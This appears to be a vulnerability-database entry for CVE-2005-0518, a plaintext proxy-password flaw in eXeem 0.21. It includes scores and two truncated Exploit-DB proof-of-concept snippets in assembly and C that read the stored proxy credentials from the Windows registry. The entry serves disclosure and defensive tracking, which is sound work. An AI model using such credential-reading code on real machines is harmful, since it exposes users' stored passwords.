CVE-2005-0518
published 2005-02-23CVE-2005-0518: eXeem 0.21 stores sensitive information such as passwords in plaintext in the Exeem registry key, which allows local users to gain privileges via the…
PriorityP412low2.1CVSS 2.0
AVLACLAuNCPINAN
EXPLOIT
EPSS
0.68%
47.8th percentile
eXeem 0.21 stores sensitive information such as passwords in plaintext in the Exeem registry key, which allows local users to gain privileges via the proxy_user and proxy_password values.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| exeem | exeem | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
eXeem 0.21 - Local Password Disclosure (ASM)
exploitdb·2005-02-26
CVE-2005-0518 eXeem 0.21 - Local Password Disclosure (ASM)
eXeem 0.21 - Local Password Disclosure (ASM)
---
;Nothing Special other than the program doesnt encode the proxy info.
.386
.model flat, stdcall
option casemap :none
include \masm32\include\windows.inc
include \masm32\include\user32.inc
include \masm32\include\kernel32.inc
include \masm32\include\shell32.inc
include \masm32\include\advapi32.inc
include \masm32\include\masm32.inc
includelib \masm32\lib\user32.lib
includelib \masm32\lib\kernel32.lib
includelib \masm32\lib\shell32.lib
includelib \masm32\lib\advapi32.lib
includelib \masm32\lib\masm32.lib
literal MACRO quoted_text:VARARG
LOCAL local_text
.data
local_text db quoted_text,0
.code
EXITM
ENDM
SADD MACRO quoted_text:VARARG
EXITM
ENDM
.data
SubKey db "Software\\Exeem\",0
szIP db "proxy_ip",0
szUser db "proxy_username",0
szPass db "
Exploit-DB
eXeem 0.21 - Local Password Disclosure
exploitdb·2005-02-22
CVE-2005-0518 eXeem 0.21 - Local Password Disclosure
eXeem 0.21 - Local Password Disclosure
---
/*****************************************************************
eXeem v0.21 Local Exploit by Kozan
Application: eXeem v0.21
Vendor: www.exeem.com
Vulnerable Description: eXeem v0.21 discloses passwords
for proxy settings to local users.
Discovered & Coded by: Kozan
Credits to ATmaCA
Web : www.netmagister.com
Web2: www.spyinstructors.com
Mail: kozan[at]netmagister[dot]com
*****************************************************************/
#include
#include
#define BUFSIZE 100
HKEY hKey;
char proxy_ip[BUFSIZE],
proxy_username[BUFSIZE],
proxy_password[BUFSIZE];
DWORD dwBufLen=BUFSIZE;
LONG lRet;
int main()
{
if(RegOpenKeyEx(HKEY_CURRENT_USER, "Software\\Exeem",
0,
KEY_QUERY_VALUE,
&hKey) == ERROR_SUCCESS)
{
lRet = RegQueryValueEx( hKey,
No writeups or analysis indexed.
2005-02-23
Published